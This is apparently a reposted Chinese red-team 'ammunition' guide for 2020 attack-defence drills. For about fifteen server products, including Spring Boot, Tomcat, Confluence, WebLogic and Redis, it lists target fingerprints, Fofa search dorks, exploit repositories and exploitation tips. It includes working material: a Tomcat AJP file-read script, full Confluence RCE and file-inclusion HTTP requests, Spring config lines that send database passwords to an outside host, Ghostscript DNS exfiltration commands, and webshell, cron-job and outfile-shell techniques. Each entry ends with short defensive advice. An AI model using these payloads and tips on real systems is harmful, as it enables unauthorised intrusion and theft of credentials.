2020攻防演练弹药库

Thinkphp 相关漏洞

  1. 漏洞简介

Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题

  1. 影响组件
    Thinkphp

  2. 漏洞指纹

Thinkphp

X-Powered-By: ThinkPHP

  1. Fofa Dork

app="ThinkPHP"

  1. 漏洞分析

ThinkPHP漏洞总结 – 赛克社区
http://zone.secevery.com/article/1165

挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心
https://blog.riskivy.com/挖掘暗藏thinkphp中的反序列利用链/

ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客
https://blog.csdn.net/Fly_hps/article/details/81201904

DSMall代码审计 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/203461

  1. 漏洞利用

SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写
https://github.com/Dido1960/thinkphp

whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具
https://github.com/whirlwind110/tphack

  1. 利用技巧

1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露

2.自从我挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中

3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞

DSMall代码审计 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/203461

  1. 防护方法

1.及时更新补丁

2.升级到最新版Thinkphp

3.前置WAF进行防护

Spring 系列漏洞

  1. 漏洞简介

Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒

  1. 影响组件
    Spring xxx

  2. 漏洞指纹

X-Application-Context:

  1. Fofa Dork

app="Spring-Framework"

  1. 漏洞分析

Spring 框架漏洞集合 ~ Misaki’s Blog
https://misakikata.github.io/2020/04/Spring-框架漏洞集合/

Exploiting Spring Boot Actuators | Veracode blog
https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog
https://jianfensec.com/漏洞复现/Spring Boot Actuators配置不当导致RCE漏洞复现/

  1. 漏洞利用

mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE
https://github.com/mpgn/Spring-Boot-Actuator-Exploit

artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
https://github.com/artsploit/yaml-payload

  1. 利用技巧

1.Spring Boot Actuators 相关漏洞超级好用

很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题

尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务

然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的

/env 可以偷session, RCE

/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象

可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下

/trace
/health
/loggers
/metrics
/autoconfig
/heapdump
/threaddump
/env
/info
/dump
/configprops
/mappings
/auditevents
/beans
/jolokia
/cloudfoundryapplication
/hystrix.stream
/actuator
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
/monitor
/monitor/auditevents
/monitor/beans
/monitor/health
/monitor/conditions
/monitor/configprops
/monitor/env
/monitor/info
/monitor/loggers
/monitor/heapdump
/monitor/threaddump
/monitor/metrics
/monitor/scheduledtasks
/monitor/httptrace
/monitor/mappings
/monitor/jolokia
/monitor/hystrix.stream
这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作

里面就有操作空间, 很像fastjson反序列化

2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok

springboot Information Disclosure
https://gist.github.com/UUUUnotfound/fed628b074859997d6970717ddd7fbf3

eureka.client.serviceUrl.defaultZone=http://${somedb.password}@127.0.0.1:5000

spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群

eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了

  1. 防护方法

1.及时更新补丁

2.开启Spring Boot Actuators权限校验

3.前置WAF进行防护

Phpstudy 后门远程代码执行

  1. 漏洞简介

Phpstudy 是一个国产的php快速集成环境, 主要用于学习测试, 但是也有很多人直接拿来部署服务器

  1. 影响组件

Phpstudy

  1. 漏洞指纹

phpStudy 探针

  1. Fofa Dork

app="phpStudy 探针"

  1. 漏洞分析

PhpStudy 后门分析
https://paper.seebug.org/1044/

  1. 漏洞利用

NS-Sp4ce/PHPStudy_BackDoor_Exp: PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

  1. 利用技巧

1.phpstudy 根目录下面有个l.php , 里面有探针, 可以作为判断条件

2.还有个/phpmyadmin目录, 一般密码都是root/root 后台mysql outfile 写 shell 就ok了

  1. 防护方法

1.及时删除phpstudy

2.升级到最新版

3.不要用phpstduy搭建生产环境

Struts 系列漏洞

  1. 漏洞简介

Struts 真的是Java漏洞史上浓墨重彩的一笔, 堪称那些年的漏洞之王, 一直到现在还没有消失, 企业内网还是有不少存在

  1. 影响组件
    Struts

  2. 漏洞指纹

Struts

.action

.do

.action!xxxx

struts2_check/struts2_hunt_v2.py at master · coffeehb/struts2_check
https://github.com/coffeehb/struts2_check/

  1. Fofa Dork

app="Struts2" (这个不太准)

  1. 漏洞分析

Struts2代码执行漏洞整理 – 简书
https://www.jianshu.com/p/d7cd8a2a992b

  1. 漏洞利用

struts-scan/struts-scan.py at master · Lucifer1993/struts-scan

https://github.com/Lucifer1993/struts-scan/

  1. 利用技巧

1.Struts 的漏洞(比如016, 032)经常可以用于ssrf打内网, 说不好就有惊喜

  1. 防护方法

1.升级到最新版

2.不建议使用Struts

Solr 系列漏洞

  1. 漏洞简介

Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞,

  1. 影响组件

Solr

  1. 漏洞指纹

Solr

  1. Fofa Dork

app="Solr"

  1. 漏洞分析

Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/218730.html

Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
https://paper.seebug.org/1009/

  1. 漏洞利用

veracode-research/solr-injection: Apache Solr Injection Research
https://github.com/veracode-research/solr-injection

jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”)
https://github.com/jas502n/CVE-2019-12409

mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit
https://github.com/mogwailabs/mjet

  1. 利用技巧

1.看到锤就完事了, 漏洞太多了, 一片一片的

2.遇到mjet连接超时, 这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作

  1. 防护方法

1.升级到最新版

2.不要对外开放敏感端口

Tomcat 本地文件包含漏洞 (CVE-2020-1938)

  1. 漏洞简介

Tomcat 是常见的Web 容器, 用户量非常巨大, Tomcat 8009 ajp端口一直是默认开放的, 这个漏洞存在很多年了, 这次应该有奇效

  1. 影响组件

Apache Tomcat 6

Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51

Apache Tomcat 9 < 9.0.31

  1. 漏洞指纹

tomcat

8009

ajp

\x04\x01\xf4\x00\x15

  1. Fofa Dork

protocol="ajp"

  1. 漏洞分析

Apache Tomcat AJP协议文件包含漏洞分析 – 斗象能力中心
https://blog.riskivy.com/apache-tomcat-ajp协议文件包含漏洞分析/

  1. 漏洞利用

0nise/CVE-2020-1938: CVE-2020-1938
https://github.com/0nise/CVE-2020-1938

  1. 利用技巧

1.当时还没公开poc的时候就分析出来exp挺有意思的, 效果确实还可以, 当天fofa都被累挂了

主要代码也就这

t = Tomcat("127.0.0.1", 8009)
_, data = t.perform_request('/', attributes=[
{'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', "/WEB-INF/web.xml"]},
{'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
])
print('----------------------------')
print("".join([bytes.decode(d.data) for d in data]))
2.通过修改这里的路径可以进行Webapp切换, 默认是ROOT/, 需要切换应用就改成 /admin/ 之类的

3.通常检测的时候, 尽量保持t.perform_request('/' , 有的poc喜欢用 /addsd 这种的不存在的路径, 有些情况会读不到文件

  1. 防护方法

1.升级到最新版

2.屏蔽8009端口对外开放

PHP-FPM 远程代码执行漏洞

  1. 漏洞简介

国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现, 向目标服务器 URL 发送 %0a 符号时, 服务返回异常, 疑似存在漏洞

2019年10月23日, github公开漏洞相关的详情以及exp.当nginx配置不当时, 会导致php-fpm远程任意代码执行

  1. 影响组件

Nginx + FPM + PHP7

  1. 漏洞指纹

Nginx

PHP

nextcloud

  1. Fofa Dork

  2. 漏洞分析

PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
https://paper.seebug.org/1063/

  1. 漏洞利用

neex/phuip-fpizdam: Exploit for CVE-2019-11043
https://github.com/neex/phuip-fpizdam

jas502n/CVE-2019-11043: php-fpm+Nginx RCE
https://github.com/jas502n/CVE-2019-11043

  1. 利用技巧

1.这个漏洞检测没有特别稳定的方案, 目前可以参考k8的检测方案, 通过递增发送payload检测服务器502

k8gege/CVE-2019-11043: Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)
https://github.com/k8gege/CVE-2019-11043

2.Nextcloud 这个应用的默认配置就存在漏洞

  1. 防护方法

1.升级到最新版php

2.修改nginx配置

CVE-2019-3396 Confluence Wiki 远程代码执行

  1. 漏洞简介

Confluence Wiki 是企业常用的 Wiki 平台, 其媒体插件存在一处远程代码执行

  1. 影响组件

Confluence

  1. 漏洞指纹

Confluence

  1. Fofa Dork

app="Confluence"

  1. 漏洞分析

Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
https://paper.seebug.org/884/

Atlassian Confluence 远程代码执行漏洞分析 – 斗象能力中心

Atlassian Confluence 远程代码执行漏洞分析

  1. 漏洞利用

jas502n/CVE-2019-3396: Confluence 未授权 RCE (CVE-2019-3396) 漏洞
https://github.com/jas502n/CVE-2019-3396

  1. 利用技巧

1.本地写日志的方式getshell

这个漏洞挺有意思的, 在国内没公开的时候, 我们就监测到了, 然后也写出了exp, 奈何没几天就曝光了

这里的远程模板加载不支持http协议, 主要是classloader的问题, 不然应该更早挖出来, 这里还有一种本地写日志的方式getshell

这是一个从来没有人关注的默认开放的8091端口, 部分低版本支持file协议可以getshell, 适用于不出网的情况, 这个poc不是特别稳定, 因为日志中有不可控的字符

velocity比php语法要相对严格一点, 可能会报错, 而且velocity渲染的时候, 目标文件不能太大, 但是极端情况可以试一下

GET /synchrony/heartbeat HTTP/1.1
Host: localhost:8091
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html, /; q=0.01
Accept-Language: en-US, en;q=0.5
Referer: http://localhost:8091
Connection: close
x-forwarded-for: $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('gnome-calculator').waitFor()
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html, /; q=0.01
Accept-Language: en-US, en;q=0.5
Referer: http://localhost:8090/
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 258
Connection: close

{"contentId":"65594", "macro":{"name":"widget", "body":"", "params":{"url":"http://www.dailymotion.com/video/xcpa64?_template=/etc/passwd", "width":"300", "height":"200", "_template":"file:/var/atlassian/application-data/confluence/logs/atlassian-synchrony.log"}}}
8. 防护方法

1.升级到最新版

2.尽量不要开放到公网

3.限制来源IP

Ghostscript 上传图片代码执行

  1. 漏洞简介

Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招

  1. 影响组件

imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用

  1. 漏洞指纹

.ps/.jpg/.png

  1. Fofa Dork

  2. 漏洞分析

ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台
https://www.anquanke.com/post/id/157513

  1. 漏洞利用

Exploit Database Search
https://www.exploit-db.com/search?q=Ghostscript

vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub
https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116

  1. 利用技巧

1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行

dnslog 可以用 ping uname.admin.ceye.io 或 ping whoami.admin.ceye.io

保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造

ping whoami.centos.admin.ceye.io / ping whoami.ubuntu.admin.ceye.io

分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的

  1. 防护方法

1.升级到最新版

Jboss 相关漏洞

  1. 漏洞简介

JBoss是一个基于J2EE的开放源代码应用服务器, 用户数量较大, 一些版本受到反序列化等漏洞影响

  1. 影响组件

Jboss

  1. 漏洞指纹

Jboss

  1. Fofa Dork

app="JBoss"

  1. 漏洞分析

打开JBoss的潘多拉魔盒:JBoss高危漏洞分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/186948.html

  1. 漏洞利用

joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
https://github.com/joaomatosf/jexboss

Perun/vuln/jboss at master · WyAtu/Perun
https://github.com/WyAtu/Perun/tree/master/vuln/jboss

  1. 利用技巧

1.Jboss的漏洞在内网还是相对比较常见的, 试过几次jexboss, 效果还ok

  1. 防护方法

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

4.升级到最新版

Websphere 反序列化远程代码执行

  1. 漏洞简介

Websphere 也是常见的java服务器, CVE-2015-7450(由于Comments Collections反序列化引起的, 应该是反序列化第一次被公众关注), 去年暴露了一个CVE-2019-4279(),

近期暴露了一个新的远程代码执行(CVE-2020-4276, CVE-2020-4362)

  1. 影响组件

WebSphere

  1. 漏洞指纹

WebSphere

8880

  1. Fofa Dork

app="IBM-WebSphere"

  1. 漏洞分析

What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#websphere

Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279) – 先知社区
https://xz.aliyun.com/t/6394

  1. 漏洞利用

java-deserialization-exploits/websphere_rce.py at master · Coalfire-Research/java-deserialization-exploits
https://github.com/Coalfire-Research/java-deserialization-exploits/blob/master/WebSphere/websphere_rce.py

Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279) – 先知社区
https://xz.aliyun.com/t/6394

  1. 利用技巧

1.Java 类的 web 容器 getshell 方法都差不多, 弱口令进后台部署 war, 或者反序列化, 文件上传之类的

Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结 – 先知社区
https://xz.aliyun.com/t/309

  1. 防护方法

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

4.升级到最新版

Jenkins 系列漏洞

  1. 漏洞简介

Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

  1. 影响组件

Jenkins

  1. 漏洞指纹

Jenkins

  1. Fofa Dork

app="Jenkins"

  1. 漏洞分析

Jenkins RCE漏洞分析汇总
http://www.lmxspace.com/2019/09/15/Jenkins-RCE漏洞分析汇总/?utm_source=tuicool&utm_medium=referral#₩タᄏ￧ᄏモ

Jenkins漏洞集合复现 ~ Misaki’s Blog
https://misakikata.github.io/2020/03/Jenkins漏洞集合复现/

  1. 漏洞利用

Jenkins漏洞集合复现 ~ Misaki’s Blog
https://misakikata.github.io/2020/03/Jenkins漏洞集合复现/

blackye/Jenkins: Jenkins漏洞探测、用户抓取爆破
https://github.com/blackye/Jenkins

gquere/pwn_jenkins: Notes about attacking Jenkins servers

https://github.com/gquere/pwn_jenkins

  1. 利用技巧

1.Jenkins 也是收集内网信息的好地方, 获取的账号通常也是开发/运维级别的, 权限相对较大

  1. 防护方法

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

4.升级到最新版

RMI 对外开放

  1. 漏洞简介

Java RMI, 即 远程方法调用(Remote Method Invocation), 一种用于实现远程过程调用(RPC)(Remote procedure call)的Java API, 能直接传输序列化后的Java对象和分布式垃圾收集

通常开放在1090 1099等端口, 由于直接传输java对象, 随意存在远程代码执行.

  1. 影响组件

java*

  1. 漏洞指纹

1098, 1099, 1090, 8901, 8902, 8903

N\x00

rmiregistry

  1. Fofa Dork

protocol=="java-rmi"

  1. 漏洞分析

RMI-反序列化 – 先知社区
https://xz.aliyun.com/t/6660

  1. 漏洞利用

Jenkins漏洞集合复现 ~ Misaki’s Blog
https://misakikata.github.io/2020/03/Jenkins漏洞集合复现/

Java RMI服务远程命令执行利用_91Ri.org
http://www.91ri.org/15276.html

  1. 利用技巧

1.rmi一般在内网开放的比较多, nmap 扫描如下

nmap -v 8.8.8.8 -p1099 -sV --script=rmi*

  1. 防护方法

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

Weblogic T3 协议漏洞

  1. 漏洞简介

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击.

  1. 影响组件

Weblogic

  1. 漏洞指纹

Lcom.tangosol.util.extractor.ReflectionExtractor

  1. Fofa Dork

protocol=="weblogic"

  1. 漏洞分析

相关漏洞有:

CVE-2017-3248
https://paper.seebug.org/333/

CVE-2018-2628
http://xxlegend.com/2018/04/18/CVE-2018-2628 简单复现和分析/

CVE-2018-2893
https://www.freebuf.com/vuls/178105.html

CVE-2019-2890
https://paper.seebug.org/1069/

CVE-2020-2555(Oracle Coherence)
https://paper.seebug.org/1141/

除此之外, 还有最近Oracle 2020年4月安全通告中的CVE-2020-2801, CVE-2020-2883, CVE-2020-2884, CVE-2020-2915(Oracle Coherence)等漏洞.
https://www.oracle.com/security-alerts/cpuapr2020.html

  1. 漏洞利用

weblogic 漏洞扫描工具
https://github.com/0xn0ne/weblogicScanner

CVE-2020-2555
https://github.com/Y4er/CVE-2020-2555

  1. 利用技巧

1.T3 协议通常开放在内网, 外网基本绝迹, 快速检测可以使用nmap

nmap -sV --script=weblogic-t3-info.nse -p 7001

2.内网使用最新的利用链即可, weblogic也支持TLS加密的t3s, 可以使用

Bort-Millipede/WLT3Serial: Native Java-based deserialization exploit for WebLogic T3 (and T3S) listeners.
https://github.com/Bort-Millipede/WLT3Serial

  1. 防护方法

1.及时更新补丁
2.禁用T3协议
3.禁止T3端口对外开放, 或者限制可访问T3端口的IP来源

Weblogic XMLDecoder反序列化

  1. 漏洞简介

2017年4月Oacle官方安全通告, 包含了对与CVE编号CVE-2017-3506的修复补丁, wls-wsat这个提供的web service服务中, 处理xml数据的的时候, XMLDecoder的反序列化漏洞风险, 同年10月份的补丁中的则是对其绕过的修复, CVE编号为CVE-2017-10271.

2019年4月17日, CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告》, 部分版本WebLogic中默认包含的wls9_async_response包, 为WebLogic Server提供异步通讯服务.由于该WAR包在反序列化处理输入信息时存在缺陷, 攻击者可以发送精心构造的恶意 HTTP 请求, 获得目标服务器的权限, 在未授权的情况下远程执行命令.

  1. 影响组件

WebLogic 10.X

WebLogic 12.1.3

  1. 漏洞指纹

/wls-wsat/CoordinatorPortType
/_async/AsyncResponseService
/_async/AsyncResponseServiceSoap12

  1. Fofa Dork

app="WebLogic-Server"

  1. 漏洞分析

(CVE-2017-3506 &CVE-2017-10271)
http://xxlegend.com/2017/12/23/Weblogic XMLDecoder RCE分析/

CVE-2019-2725
https://paper.seebug.org/909/

  1. 漏洞利用
    weblogicScanner
    https://github.com/0xn0ne/weblogicScanner

  2. 利用技巧

1.由于nginx转发问题, 尝试这种路径, 可能有惊喜

/../wls-wsat/CoordinatorPortType11
/../_async/AsyncResponseService

2.Weblogic 写shell有个技巧

可以通过find/grep命令查找静态文件的路径, 然后将命令结果输出到静态文件夹中, 比如查找前台的logo.png / /static/css/main.css

  1. 防护方法

1.通过访问策略控制禁止外部/_async/* 及 /wls-wsat/*路径的URL访问;

2.删除对应war包并重启 webLogic;

3.限制源IP对应 weblogic 7001端口的访问.

Weblogic IIOP

  1. 漏洞简介

2017年4月Oacle官方安全通告中, 包含了对与CVE编号CVE-2020-2551的补丁, 未经身份验证的攻击者可以通过IIOP对Oracle WebLogic Server进行攻击, 造成远程代码执行.

  1. 影响组件

Oracle WebLogic Server version:

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0 and 12.2.1.4.0

  1. 漏洞指纹

GIOP && com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager

  1. Fofa Dork

app="WebLogic-Server"

  1. 漏洞分析

WebLogic CVE-2020-2551漏洞分析
https://paper.seebug.org/1138/

  1. 漏洞利用

Y4er/CVE-2020-2551: Weblogic IIOP CVE-2020-2551
https://github.com/Y4er/CVE-2020-2551

  1. 利用技巧

漫谈WebLogic CVE-2020-2551 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/201005

  1. 防护方法

1.及时更新补丁

2.通过 Weblogic 控制台进行关闭 IIOP 协议

Redis 相关漏洞

  1. 漏洞简介

Redis 在近几年也是攻击的重点, 早期Redis默认没有密码, 且经常开放到公网, Redis可以进行文件写入, 以及后面的主从复制远程代码执行漏洞, 或者配合缓存序列化数据进行操作

  1. 影响组件

Redis

  1. 漏洞指纹

6379

  1. Fofa Dork

app="Redis" && "redis_version"

  1. 漏洞分析

Redis 基于主从复制的 RCE 利用方式
https://paper.seebug.org/975/

  1. 漏洞利用

n0b0dyCN/RedisModules-ExecuteCommand: Tools, utilities and scripts to help you write redis modules!
https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

  1. 利用技巧

1.当Redis 权限满足写文件时

linux 写计划任务, windows写启动目录, 如果可以都写web目录的webshell

2.当Redis 权限不满足写文件时

发现Redis记录中存在JSON串的时候, 可以尝试写入Fastjson或Jackson的反序列化漏洞

发现Redis记录中存在AC ED这种反序列化特征的时候, 可以尝试写入ysoserial产生的序列化数据

  1. 防护方法

1.Redis 设置强口令

2.Redis 尽量不要开放到公网

3.限制来源IP

原文:
https://blog.riskivy.com/2020攻防演练弹药库

posted @ 2020-04-27 20:53  a&zk  阅读(707)  评论(0)    收藏  举报